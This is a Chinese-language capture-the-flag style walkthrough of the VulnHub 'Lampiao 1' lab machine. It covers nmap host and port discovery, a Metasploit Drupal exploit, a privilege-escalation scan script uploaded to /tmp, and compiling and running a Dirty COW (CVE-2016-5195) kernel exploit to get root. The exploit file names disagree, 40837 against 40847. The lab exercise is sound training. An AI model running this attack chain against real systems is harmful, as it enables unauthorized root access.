靶机环境下载地址https://www.vulnhub.com/entry/lampiao-1,249/
环境:攻击机:kali虚拟机192.168.76.132 靶机:ip未知
过程:探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权
靶机密码也没有,ip也没有
探针目标
靶机和kali在同网段,所以kali用nmap扫描同网段存活主机和其端口
namp 192.168.76.0/24 扫出一个192.168.76.141的主机
继续扫他的端口
nmap -p1 -65535 192.168.76.141 扫出个80和1898端口
上去看看发现80端口没用,1898有个web,cms是drupal
CMS漏洞利用
搜索引擎搜索exp
或msf直接search drupal
这里使用这个漏洞
脚本探针提权漏洞
把漏扫脚本从kali上传到靶机的tmp目录,命名为1.sh
msf进入shell,执行漏扫文件。权限不足就chmod +x 1.sh赋权
扫描出多个漏洞,这里我们选择CVE-2016-5195(脏牛漏洞,可以借助webshell权限提升)
利用内核提权
下载EXP,上传至目标主机
upload /tmp/40837.cpp /tmp/40837.cpp
用gcc把.cpp的exp文件编译为exe文件:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
创建交互会话(因为提权过程有交互,不创建会卡住无法提权成功):
python -c ‘import pty; pty.spawn("/bin/bash")’
运行exp,成功提权
得到flag
在靶机root下的flag中,用cat